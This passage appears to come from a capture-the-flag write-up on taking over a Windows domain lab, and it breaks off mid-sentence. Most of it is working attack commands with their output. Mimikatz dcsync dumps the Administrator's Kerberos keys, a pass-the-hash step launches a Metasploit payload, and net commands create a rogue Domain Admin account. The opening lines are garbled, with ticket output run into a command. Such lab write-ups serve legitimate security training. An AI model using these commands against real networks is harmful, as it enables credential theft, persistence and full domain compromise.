Renew Time: 10/22/2019 23:17:09 (local)

Session Key Type: AES-256-CTS-HMAC-SHA1-96

Cache Flags: 0x1 -> PRIMARY

Kdc Called: C:\temp>dir \\dc.neurosoft.ctf\c$

Access is denied.

PTH again and again…

# Get Administrator's account hash

mimikatz # lsadump::dcsync /dc:dc.neurosoft.ctf /domain:neurosoft.ctf /user:Administrator ...

* Primary:Kerberos-Newer-Keys *

Default Salt : NEUROSOFT.CTFAdministrator

Default Iterations : 4096

Credentials

aes256_hmac (4096) : 74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9

aes128_hmac (4096) : f645bbe57528cd1a95bf06779dcc98b3

des_cbc_md5 (4096) : a2b92a85641ce0c7

... # Spawn a shell with PTH

mimikatz # sekurlsa::pth /user:Administrator /domain:neurosoft.ctf /aes256:74f5097d9ba3c07ea8f73fb6e613e77b782b6b2da53bab050c014db1faa2b5f9 /run:payload_msf_x64.exe

## Change session # Grab the flag

C:\temp>dir \\dc.neurosoft.ctf\c$

C:\temp>type \\dc.neurosoft.ctf\c$\flag.txt

Pop dc.neurosoft.ctf

By default, most network services are not enabled on Windows 2016. All tricks involving psexec and WMI did not work. The simplest approach at this point was to create a Domain Admin account and use RDP for the rest.

C:\temp>net user mdube FuckWindows1 /add /domain

C:\temp>net group “Domain Admins” mdube /add /domain

# Login using RDP C:\temp>net use \\dev.neurosoft.ctf\c$

C:\temp>copy \\dev.neurosoft.ctf\c$\temp\payload_msf_x64.exe .\

C:\temp>.\payload_msf_x64.exe

Status at this point